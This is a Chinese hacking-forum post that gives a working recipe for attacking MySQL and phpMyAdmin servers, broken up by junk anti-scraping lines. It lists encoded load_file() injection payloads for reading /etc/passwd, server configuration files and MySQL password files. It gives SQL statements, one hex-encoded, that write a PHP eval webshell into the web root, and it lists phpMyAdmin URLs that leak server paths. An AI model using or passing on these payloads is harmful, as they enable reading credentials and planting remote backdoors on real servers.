中国网络渗透测试联盟
标题:
利用load_file()获取敏感文件与phpmyadmin拿webshell
[打印本页]
作者:
admin
时间:
2013-7-13 19:27
标题:
利用load_file()获取敏感文件与phpmyadmin拿webshell
利用load_file()获取敏感文件与phpmyadmin拿webshell
3 g) c' j5 R) B v4 V: I4 \
针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径: 1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20) 2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32)) 上面两个是查看一个PHP文件里
+ s( V+ \# s/ b% D! m1 N( u
针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径:
* ]# W8 _3 `0 ] F' k
6 C( s' E" M1 _! _: i
1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20)
1 O! t. l0 n' O! R2 y2 B' B& Z
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
( y. B ^( ]7 C& H- ^
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 < 替换成空格 返回的是网页.而无法查看到代码.
# s; F |* I! Q& L! x7 D
3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
, B( ~& Q# o% k% \# A$ C. e
4、/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
! x8 A0 x, a6 F! ]% r
5、crogram FilesApache GroupApacheconf httpd.conf 或C:apacheconf httpd.conf 查看WINDOWS系统apache文件
3 Y. C3 V& L% l; @- ~8 }! |
6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.
1 V; A% V& B0 U$ ` F# r
7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
& _( C+ J+ Y% H# a* H5 y
8、d:APACHEApache2confhttpd.conf
" M8 ?1 E4 [9 r$ v K' U$ |
9、Crogram Filesmysqlmy.ini
9 Q1 k: ]: }; d/ h( e
10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
$ C; Q- j1 a! y8 m8 ]. q
11、 c:windowssystem32inetsrvMetaBase.xml 查看IIS的虚拟主机配置文件
7 ~2 d4 t8 M8 [1 n' J+ L
12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
( t& C- @. Q- j9 V
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
; C; p# e5 r, k& d5 M, ?
14 、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
0 u/ ~" h! }/ P. {
15、 /etc/sysconfig/iptables 本看防火墙策略
9 N2 m& t$ O; T: g: V) G; |$ b5 O
16 、 usr/local/app/php5/lib/php.ini PHP 的相当设置
1 Y; [6 [2 [2 h0 i7 N/ \2 ~
17 、/etc/my.cnf MYSQL的配置文件
# [- N, S, ?- \, c
18、 /etc/redhat-release 红帽子的系统版本
3 T2 j% r0 a* a2 V
19 、C:mysqldatamysqluser.MYD 存在MYSQL系统中的用户密码
3 h* V ~& C0 L6 I6 M. k; _
20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
) U" @; I2 n2 C* X
21、/usr/local/app/php5/lib/php.ini //PHP相关设置
8 N3 E n2 w8 u: z, n
22、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
5 W9 J2 T) H$ |9 E
23、crogram FilesRhinoSoft.comServ-UServUDaemon.ini
6 y- F0 p& `8 j+ T
24、c:windowsmy.ini
4 `3 Z6 g5 z1 c& D
---------------------------------------------------------------------------------------------------------------------------------
7 |9 K/ Z8 f& \2 t; i
1.如何拿到登陆密码. 自己想办法
4 |8 b( q" T& ^7 m
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
* g9 s7 a3 ?5 O
3.选择一个Database.运行以下语句.
9 _5 O2 F: S5 ~. L4 k; n0 Q
----start code---
& W" ]: Y( _ ?. E
Create TABLE a (cmd text NOT NULL);
) d# _5 }) i+ I
Insert INTO a (cmd) VALUES('<?php eval($_POST[cmd]);?>');
8 S. R" F8 Y( b( k
select cmd from a into outfile 'x:/phpMyAdmin/libraries/d.php';
* x" m+ s" u! {' T# A
Drop TABLE IF EXISTS a;
Y* |0 E3 I. s* k; P5 T1 l
----end code---
- Q% d' G$ [$ p }* n" s
4.如果没什么意外.对应网站得到webshell
+ e; d9 a( f7 o, R' m- e, j0 t
思路与mssql一样,都是建个表,然后在表中插一句话木马,在导出到web目录!
2 w5 i4 Q4 S# R' C7 E+ Z
补充:还可以直接用dumpfile来得到shell
( l. s# Q9 Y. J1 R& d5 S7 d& B& v* ~: Q
select 0x3c3f706870206576616c28245f504f53545b636d645d293f3e into DUMPFILE 'C:/XXX/php.php';
3 y6 ]) s* ]8 k" f' K) D1 r
加密部分为 lanker 一句话 密码为 cmd
5 _5 ^+ |; k3 f' \
--------------------------------------------------------------------------------------------------------
' f) j) W2 K% ^; @/ \: t1 h
phpmyadmin的libraries目录多个文件存在绝对路径泄露漏洞- -
- q3 }* L; M. A5 I6 b
$ s0 f5 ` J8 R1 f1 B" H8 \) H) r
http://target/phpmyadmin/libraries/string.lib.php
v% q5 o) ]& ^! c
http://target/phpmyadmin/libraries/string.lib.php
: L7 V6 u; _# J6 I$ f) a
http://target/phpmyadmin/libraries/database_interface.lib.php
0 P- G; V Z4 [0 c& S
http://target/phpmyadmin/libraries/db_table_exists.lib.php
) t! z4 p2 D' Y0 c8 F
http://target/phpmyadmin/libraries/display_export.lib.php
7 Z) X! A+ D9 {, r6 P- H- B1 E3 Z& q
http://target/phpmyadmin/libraries/header_meta_style.inc.php
! _6 \% v, X0 Q& j/ h
http://target/phpmyadmin/libraries/mcrypt.lib.php
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2